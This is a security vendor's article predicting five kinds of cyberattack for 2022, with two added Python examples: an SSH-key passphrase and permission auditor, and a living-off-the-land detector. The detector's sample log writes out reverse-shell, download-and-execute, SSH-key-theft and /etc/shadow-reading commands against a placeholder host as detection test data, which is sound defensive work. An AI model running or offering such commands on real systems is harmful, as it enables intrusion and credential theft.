Five Concerning Cyberattacks to Watch Out for in 2022


Threats are unlikely to slow down in 2022. In fact, our experts expect cyberattacks to increase, which is unwelcome news at a time when the attack surface keeps expanding.

Organizations struggling to integrate and manage a collection of single-purpose security products are left at risk by the resulting complexity and lack of visibility. They must close these gaps as quickly as possible, but first they need to know where to focus.

Five Types of Cyberattacks to Look Out For in 2022

To set the stage for the 2022 threat environment, let’s take a look at some of the most noteworthy cybersecurity statistics from 2021.

Despite many organizations putting their best foot forward to protect their networks, they still face risks. Minimizing this risk will require them to start preparing for emerging cyberthreats today. And while no one can predict the future, here are five up-and-coming threats we’re keeping an eye on at FortiGuard Labs.

1. Linux Attacks

Until recently, Linux was largely ignored by cybercriminals, but that is changing. Because Linux runs the back-end systems of many networks and the container platforms behind IoT devices and mission-critical applications, it is becoming a more popular target. At this point, attacks against Linux and the applications running on it are as prevalent as attacks on Windows.

Many organizations are well practised at defending against Windows attacks but have not kept up with Linux from a defensive and malware-analysis standpoint. Worse, Linux environments often hold exactly what an attacker wants: Secure Shell (SSH) credentials, certificates, and application usernames and passwords.
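The SSH credentials mentioned above are among the first things an intruder on a Linux host goes looking for, so a practitioner will want to know which private keys are stored without a passphrase or with file modes that let other local accounts read them. The audit below is an added example, not code from the original article or from Fortinet. It parses the two on-disk formats ssh-keygen writes (the openssh-key-v1 container, whose cipher-name field is "none" for an unencrypted key, and the legacy PEM container with its Proc-Type header), assumes only a directory to walk, and exercises itself on keys constructed in a temporary directory with the real container layout but dummy key material.

```python
"""Find SSH private keys with no passphrase or loose file permissions.
Added example, not code from the original article or from Fortinet: it audits
the directory passed to audit_directory(); the keys demo() writes are
constructed with the real container layout but dummy key material."""
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: uint32 big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data

def key_is_encrypted(text: str) -> bool:
    """True if the PEM-wrapped private key is passphrase-protected: for the
    openssh-key-v1 container the cipher-name field is not 'none'; for legacy
    PEM a 'Proc-Type: 4,ENCRYPTED' header; for PKCS#8 the BEGIN line itself."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        raise ValueError("not a PEM-wrapped private key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)  # first field after the magic: string ciphername
        (n,) = struct.unpack(">I", blob[off:off + 4])
        return blob[off + 4:off + 4 + n] != b"none"
    if lines[0] == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return True
    return any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)

def audit_directory(path: str) -> list:
    """Walk `path`; one finding per private key that is unencrypted or has any
    group/other permission bit set. Sorted by path so results are stable."""
    findings = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                st = os.stat(full)
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            if "PRIVATE KEY-----" not in text.lstrip().split("\n", 1)[0]:
                continue
            issues = []
            try:
                if not key_is_encrypted(text):
                    issues.append("no passphrase")
            except ValueError as exc:
                issues.append(f"unparseable key ({exc})")
            mode = stat.S_IMODE(st.st_mode)
            if mode & 0o077:
                issues.append(f"mode {mode:04o} readable by group/others")
            if issues:
                findings.append({"path": full, "issues": issues})
    return sorted(findings, key=lambda f: f["path"])

def make_sample_openssh_key(ciphername: bytes) -> str:
    """Constructed openssh-key-v1 container: real field order, dummy key material."""
    kdf = b"none" if ciphername == b"none" else b"bcrypt"
    blob = (OPENSSH_MAGIC + _ssh_string(ciphername) + _ssh_string(kdf)
            + _ssh_string(b"") + struct.pack(">I", 1)  # kdfoptions, key count
            + _ssh_string(b"dummy-public") + _ssh_string(b"dummy-private"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed legacy PEM key: the body is filler, only the headers matter here.
LEGACY_ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

ZmlsbGVyLW5vdC1hLXJlYWwta2V5LWJvZHk=
-----END RSA PRIVATE KEY-----
"""

def demo() -> list:
    """Write three constructed keys to a temp dir, audit it, report by file name."""
    samples = {
        "id_ed25519": (make_sample_openssh_key(b"none"), 0o600),   # no passphrase
        "id_rsa": (make_sample_openssh_key(b"aes256-ctr"), 0o644),  # encrypted, world-readable
        "deploy.pem": (LEGACY_ENCRYPTED_PEM, 0o600),                # encrypted and private: clean
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, (text, mode) in samples.items():
            full = os.path.join(tmp, name)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(text)
            os.chmod(full, mode)
        findings = audit_directory(tmp)
    return [{"file": os.path.basename(f["path"]), "issues": f["issues"]} for f in findings]
```

Run `audit_directory("/home")` or `audit_directory("/root")` as root on a real host; the cipher-name check is the important one, because a key with mode 0600 but no passphrase is still usable the moment an attacker gains that user's privileges or reads a backup.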

Vermilion Strike, a malicious Linux re-implementation of the Beacon component of Cobalt Strike, gives attackers remote access to Linux systems and initially evaded detection. Now that Microsoft is actively integrating Windows Subsystem for Linux (WSL), a compatibility layer that runs Linux binary executables natively on Windows, into Windows 11, it is inevitable that malware will follow. More botnet malware is being written for Linux platforms as well, and the recent Log4j vulnerability is a good example: many of the payloads delivered through it are Linux binaries.

2. Satellite Network Attacks

As satellite internet connectivity grows, new exploits targeting these networks will follow. About half a dozen major satellite internet providers are already in place. The biggest targets will be organizations that rely on satellite connectivity for low-latency activities such as online gaming, for delivering critical services to remote locations, and for remote field offices, pipelines, cruise lines, and airlines. The attack surface will also expand as organizations use satellite links to connect previously off-grid systems, such as remote OT devices, to their networks.

3. Cyberattacks Targeting Crypto Wallets

In an increasingly digitized world, crypto wallets are a growing target. Malware built to harvest stored wallet data lets attackers steal a Bitcoin private key, Bitcoin and other wallet addresses, and related secrets, and then drain the wallet. Attacks often start with a phishing campaign that uses the classic approach of attaching a malicious Microsoft Word document to a spam email; a macro in the document delivers malware that steals wallet information and credentials from the infected device.

Along the same lines, a fake Amazon gift card generator targets digital wallets by replacing the victim's wallet address with the attacker's. And ElectroRAT, a remote access trojan (RAT) aimed at cryptocurrency users, combines social engineering with custom cryptocurrency applications and can log keystrokes, take screenshots, upload and download files, and execute commands.

4. Ransom Attacks on OT Systems

Ransomware attacks are increasingly targeting critical infrastructure, and the phrase "killware" has been used to describe some of these incidents. The attacks do not necessarily target human lives directly; the term is used because malware that disrupts hospitals, pipelines, water treatment plants, and other critical infrastructure differs from an ordinary intrusion in the direct impact it can have on people.

Cybercriminals may be moving away from smaller targets toward larger, more public attacks that affect the physical world, including supply chains and large numbers of human victims. The near-universal convergence of IT and OT networks makes it easier for attackers to reach OT systems through the compromised home networks and devices of remote workers. Adding to the risk, attackers no longer need specialized knowledge of ICS and SCADA systems: they can buy attack kits on the dark web.

5. Attacks on the Edge

The increase in remote work has exposed corporate networks to many of the threats found on residential networks, and more network edges means more places for "living off the land" techniques to hide. With this technique, attackers use the tools and capabilities already present in a compromised environment, so their activity and data exfiltration look like normal system administration. Living-off-the-land techniques may also be combined with what we call edge access trojans (EATs), so new attacks will live off the edge, not just the land. While avoiding detection, malware in these edge environments can use local resources to monitor activity and data at the edge and then steal, hijack, or even ransom critical systems, applications, and information.
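Living off the land is hard to catch precisely because every tool involved is legitimate, so practical detection keys on combinations that have no routine administrative use: a download piped straight into a shell, a base64 decode piped into a shell, an interpreter one-liner that opens a socket, or a copy of SSH keys or /etc/shadow. The script below is an added example, not code from the original article or from Fortinet, and it does not model the edge access trojans the text predicts, which the page does not describe in enough detail to implement. The log format (timestamp, host, user, command line), the sample lines, and the rule names are all constructed for this example; in practice the parser would be pointed at auditd EXECVE records, Sysmon event 1, or EDR process telemetry.

```python
"""Flag living-off-the-land command patterns in process-execution logs.
Added example, not code from the original article or from Fortinet. The log
format (timestamp host user command) and every line in SAMPLE_LOG are
constructed for illustration; in practice feed parse_line() your own source
(auditd EXECVE records, Sysmon event 1, EDR process telemetry)."""
import re

# The tools are legitimate, so matching on names alone drowns analysts in
# false positives; each rule keys on a combination with no routine admin use.
LOTL_RULES = [
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("decode_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("dev_tcp_reverse_shell",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat_exec",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("interpreter_socket_oneliner",
     re.compile(r"\b(python3?|perl|ruby|php)\b\s+-[cer]\s+.*\bsocket\b")),
    ("ssh_key_harvest",
     re.compile(r"\b(cat|tar|cp|scp|find)\b.*\.ssh/(id_|authorized_keys)")),
    ("shadow_read",
     re.compile(r"\b(cat|cp|tar)\b.*\s/etc/shadow\b")),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_line(line: str) -> dict:
    """Split one constructed-format log line into ts/host/user/cmd."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()

def classify(cmd: str) -> list:
    """Names of every rule the command line matches (empty list if benign)."""
    return [name for name, rx in LOTL_RULES if rx.search(cmd)]

def scan(lines) -> list:
    """Parse each non-empty line; return a finding dict per line that matches."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        hits = classify(rec["cmd"])
        if hits:
            findings.append({**rec, "rules": hits})
    return findings

# Constructed sample: one edge gateway, a web-app account that gets abused, and
# two benign lines (a health check and a JSON one-liner) that must not fire.
SAMPLE_LOG = """\
2022-01-14T09:12:03Z edge-gw01 www-data curl -sS https://updates.example.net/health
2022-01-14T09:12:41Z edge-gw01 www-data curl -fsSL http://203.0.113.7/s.sh | sh
2022-01-14T09:13:02Z edge-gw01 www-data echo aGVsbG8= | base64 -d | bash
2022-01-14T09:13:30Z edge-gw01 www-data bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
2022-01-14T09:14:05Z edge-gw01 www-data nc -e /bin/sh 203.0.113.7 4444
2022-01-14T09:14:40Z edge-gw01 www-data python3 -c 'import socket,os,pty'
2022-01-14T09:15:10Z edge-gw01 root tar czf /tmp/.k.tgz /root/.ssh/id_ed25519 /root/.ssh/authorized_keys
2022-01-14T09:16:00Z edge-gw01 root cat /etc/shadow
2022-01-14T09:17:22Z edge-gw01 ops python3 -c 'import json,sys; print(json.load(sys.stdin))'
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['user']:<9} {', '.join(f['rules']):<28} {f['cmd']}")
```

The two benign lines are the point of the design: a bare curl to a health endpoint and a python one-liner that never touches a socket produce no finding, while the seven abusive lines each trip exactly one rule. Rules like these are a starting point for a detection pipeline, not a replacement for baselining what each edge device normally runs.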

Conclusion: Organizations Must Protect Against Threats New and Old

To prepare for 2022, organizations should make hardening both Linux and Windows systems a priority. When adopting new technology, they should always take a security-first approach: before adding a new connection such as a satellite link, make sure it is protected.

Keep in mind, too, that cybercriminals will keep using a tactic for as long as it works. Along with preparing for new threats, you cannot forget what is already out there. Defending against both new and existing threats requires an integrated approach to security. To fight today's evolving threats, organizations should look into a security platform built on a cybersecurity mesh architecture, with security solutions designed to work together.

This article was originally published by Fortinet and was written by Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, Fortinet.